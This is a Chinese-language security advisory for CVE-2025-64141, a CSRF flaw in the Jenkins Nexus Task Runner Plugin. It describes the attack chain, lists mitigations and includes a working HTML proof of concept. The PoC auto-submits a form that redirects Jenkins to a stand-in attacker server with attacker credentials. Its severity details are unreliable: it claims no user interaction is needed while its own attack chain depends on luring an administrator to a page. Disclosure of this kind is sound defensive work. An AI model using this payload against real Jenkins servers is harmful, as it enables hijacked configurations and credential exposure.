CVE-2025-64141 Jenkins Nexus Task Runner Plugin跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-64141

漏洞类型

跨站请求伪造(CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jenkins Nexus Task Runner Plugin

漏洞概述

CVE-2025-64141是Jenkins Nexus Task Runner Plugin中存在的一个跨站请求伪造(CSRF)漏洞。该漏洞影响0.9.2及更早版本。攻击者可以通过构造恶意的Web请求，诱导已登录的管理员或用户在不知情的情况下执行未授权操作。由于该插件允许使用指定的凭证连接到指定URL，攻击者可以利用此漏洞强制受害者的Jenkins实例连接到攻击者控制的服务器，并使用攻击者提供的凭证进行认证。这可能导致敏感信息泄露、凭证被盗用或对内部系统进行未授权访问。CVSS评分4.3属于中等严重程度，攻击复杂度低且不需要高权限或用户交互即可实施。

技术细节

该CSRF漏洞源于Jenkins Nexus Task Runner Plugin对用户请求缺乏有效的CSRF令牌验证机制。在Jenkins插件体系中，许多管理操作需要通过表单提交完成，这些表单通常需要包含Jenkins生成的会话级CSRF防护令牌(crumb)。然而，受影响版本的Nexus Task Runner Plugin在处理远程连接配置时未能正确验证此令牌。攻击者可以创建一个包含恶意HTML或JavaScript的网页，当Jenkins管理员访问该页面时，浏览器会自动向Jenkins服务器发送携带有效会话Cookie的请求。由于Jenkins使用基于Cookie的会话认证，攻击者的请求会被识别为合法用户的操作。攻击者可以指定任意URL和凭证参数，使Jenkins服务器连接到攻击者控制的服务器或执行其他恶意操作。

攻击链分析

STEP 1

步骤1

攻击者创建一个包含恶意HTML/JavaScript的网页，该页面包含自动提交的表单，指向Jenkins Nexus Task Runner Plugin的配置端点

STEP 2

步骤2

攻击者通过钓鱼邮件、恶意链接或社会工程学手段诱使Jenkins管理员访问该恶意页面

STEP 3

步骤3

受害者的浏览器在加载页面时自动向Jenkins服务器发送POST请求，携带有效的Jenkins会话Cookie

STEP 4

步骤4

由于Jenkins使用Cookie-based会话认证，且插件未正确验证CSRF令牌，请求被服务器接受并执行

STEP 5

步骤5

Jenkins服务器使用攻击者指定的URL和凭证建立连接，可能导致凭证泄露或内网资源被攻击者探测

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-64141 -->
<!-- Jenkins Nexus Task Runner Plugin <= 0.9.2 -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC - Jenkins Nexus Task Runner</title>
</head>
<body>
    <h1>Jenkins Nexus Task Runner CSRF Attack</h1>
    <p>This PoC demonstrates the CSRF vulnerability in Jenkins Nexus Task Runner Plugin.</p>
    
    <form id="csrfForm" action="http://target-jenkins:8080/plugin/nexus-task-runner/configure" method="POST" enctype="application/x-www-form-urlencoded">
        <!-- Jenkins CSRF Crumb field (if not validated) -->
        <input type="hidden" name="Jenkins-Crumb" value="attacker-controlled-or-empty">
        
        <!-- Malicious Nexus connection configuration -->
        <input type="hidden" name="nexusUrl" value="http://attacker-controlled-server.com">
        <input type="hidden" name="nexusUsername" value="attacker">
        <input type="hidden" name="nexusPassword" value="malicious-password">
        <input type="hidden" name="apply" value="Save">
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.getElementById('csrfForm').submit();
        console.log('CSRF request sent');
    </script>
    
    <p>If successful, the Jenkins server will connect to the attacker-controlled URL.</p>
</body>
</html>

影响范围

Jenkins Nexus Task Runner Plugin <= 0.9.2

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时缓解措施：1)临时禁用Nexus Task Runner Plugin;2)限制Jenkins管理员访问不受信任的网页;3)在网络层面限制Jenkins实例只能访问白名单内的URL;4)使用浏览器安全插件防止自动提交跨域表单;5)加强Jenkins管理员的安全意识培训，警惕可疑链接。